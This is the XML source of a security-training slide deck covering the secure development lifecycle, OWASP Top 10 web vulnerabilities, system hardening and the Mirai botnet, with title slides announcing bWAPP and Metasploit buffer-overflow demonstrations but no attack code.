              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="3600" b="0" i="1" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Schedule:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0B9645-5C9F-486E-B699-934DDD4BA6B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509522"/>
            <a:ext cx="9143998" cy="3219450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities And Why They Matter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Apps - OWASP Top 10 Vulnerabilities (Part 1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Apps - OWASP Top 10 Vulnerabilities (Part 2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special Mention: Buffer Overflow</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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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ko" sz="5000">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Security in the development lifecycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604582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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>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3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>SDL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="521" name="Shape 521"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1270001"/>
            <a:ext cx="8229600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 522"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="456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523" name="Shape 523"/>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524" name="Shape 524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513325" y="1735025"/>
            <a:ext cx="8229600" cy="2587200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800"/>
              <a:t>Microsoft SDL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800"/>
              <a:t>Threat modeling.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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>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3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Secure design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="531" name="Shape 531"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1270001"/>
            <a:ext cx="8229600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="456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533" name="Shape 533"/>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534" name="Shape 534"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513325" y="1735025"/>
            <a:ext cx="8229600" cy="2587200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Done before development even starts, and as part of the software development process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>This will uncover backdoors and flaws in the design of the software, and also help in implementing security requirements better as an integral part of the design.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>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3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Secure coding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="541" name="Shape 541"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1270001"/>
            <a:ext cx="8229600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Shape 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="456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543" name="Shape 543"/>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544" name="Shape 544"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513325" y="1354025"/>
            <a:ext cx="8229600" cy="1083000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Done as part of the software development process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Concepts and methodology that helps developers think an approach code from a secure point of view. Eg. Do not trust user input, concept of least privilege etc.</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857400"/>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3000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Vulnerability Assessment/Penetration Tests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="553" name="Shape 553"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1270001"/>
            <a:ext cx="8229600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="Shape 554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2956591" y="1270001"/>
            <a:ext cx="5730300" cy="456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555" name="Shape 555"/>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556" name="Shape 556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496025" y="1703725"/>
            <a:ext cx="8229600" cy="2674200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Vulnerability assessment is done usually during the User Acceptance Testing phase of development, and attempt to pick up flaws in the software. Penetration testing will attempt to exploit these flaws, and measure how potentially damaging they can be.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Shape 561"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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ko" sz="5000">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>System Hardening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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="5000">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Sometimes we face cybersecurity issues as stakeholders don’t understand the issues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Shape 597"/>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598" name="Shape 598"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321462" y="1161999"/>
            <a:ext cx="8501074" cy="2819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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="5000">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>But users have to be able to make smart decisions too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09" name="Shape 609"/>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610" name="Shape 610"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1922187" y="584387"/>
            <a:ext cx="5299625" cy="3974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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777850" y="688725"/>
            <a:ext cx="7441800" cy="36984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ko">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Top Web Vulnerabilities Today?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Shape 616"/>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617" name="Shape 617"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272925" y="195100"/>
            <a:ext cx="6451200" cy="980400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Mirai, a high profile IoT DDOS botnet, “one of the largest distributed denial of service attacks (DDoS) to date”...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Ran from CCTV cameras, DVRs and routers. Essentially worked by trying common passwords, something that can be easily avoided.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="618" name="Shape 618"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9280"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="707612" y="1337875"/>
            <a:ext cx="5158924" cy="3100625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Shape 619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6180300" y="2457700"/>
            <a:ext cx="2679600" cy="852600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko"/>
              <a:t>Yes, that’s is the entire list. This produced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>280 Gbps and 130 Mpps in DDOS capability.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Shape 624"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0" err="1">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t> Hands On Part 2.</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="5000" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun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Shape 624"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>BREAK TIME!</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="5000" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2527094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Shape 637"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="827700"/>
            <a:ext cx="8098800" cy="3488100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Bonus: Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>hickclient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>uffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>verflow</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Shape 624"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Demonstration with Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="5000" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315500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1" name="Shape 631"/>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3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0989F05D-CE88-406F-AF4D-537244298ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709126" y="811319"/>
            <a:ext cx="7912360" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
